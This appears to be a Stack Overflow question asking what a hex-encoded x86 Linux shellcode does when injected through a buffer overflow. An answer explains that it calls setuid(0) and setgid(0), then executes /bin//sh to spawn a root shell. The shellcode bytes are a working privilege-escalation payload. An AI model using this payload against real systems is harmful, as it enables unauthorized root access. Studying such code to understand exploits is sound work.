# Interpreting a shellcode

Tags: c, shellcode

I am calling a shellcode using buffer overflow to spawn a root shell. Can somebody explain what this shellcode exactly does? I have tried different shellcodes to spawn a root shell, but this was the only one which worked for me.

```
\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd
\x80
```

Comment: You don't say how you tried to find an answer. Either you tried some method and should have asked: why doesn't method X work in this case, or you don't know any such method, and should have asked: how does one solve this kind of problem. Now you just dump some unreadable hex code and leave it to us to figure out.

Comment: Do you know what 'shell code' basically is? What these hexadecimal numbers *represent*?

Comment: @Hans Lub What I am doing is to overwrite the vtable pointer in a c++ code. I have a very limited knowledge of assembly language, so when I converted this code to assembly I was unable to tell what is happening. So I am understanding how the whole overflow process work, the only thing which is not clear, what this shellcode does. I have seen similar questions on this site.

Comment: @Jongware Yes, I do. I would like a C equivalent of this code. An explanation of the assembly equivalent would be also helpful.

Comment: Use a disassembler then, like http://www2.onlinedisassembler.com/odaweb/

Comment: *>I converted this code to assembly* So **why am I not seeing this assembly code in your post?** This is just numbers to me. Do you assume everybody has time to disassemble code for your sake or everybody knows by heart what each byte means?

Comment: @Hans Lub Have you read my previous comment written to you?

Comment: @Medinoc converting this code to assembly is a one line command. And my question is for those who have time and like working with such codes.

Comment: @Hans Lub: "you just dump some unreadable hex code". Actually many tutorials just dump some unreadable hex code, without explanation. The source of this is: http://seanmurphree.com/blog/?p=157

Answer (score 3):

On first glance, the code appears to do `setuid(0)`, then `setgid(0)`, then call `sys_execve()` on some values (which include ASCII codes for `"/bin//sh"`).

Looks like this is pure "payload" code, since I don't see anything to ensure the code is executed on the first place (buffer overflow, stack smashing, etc.).

(Thanks to @Hans Lub for the disassembler link)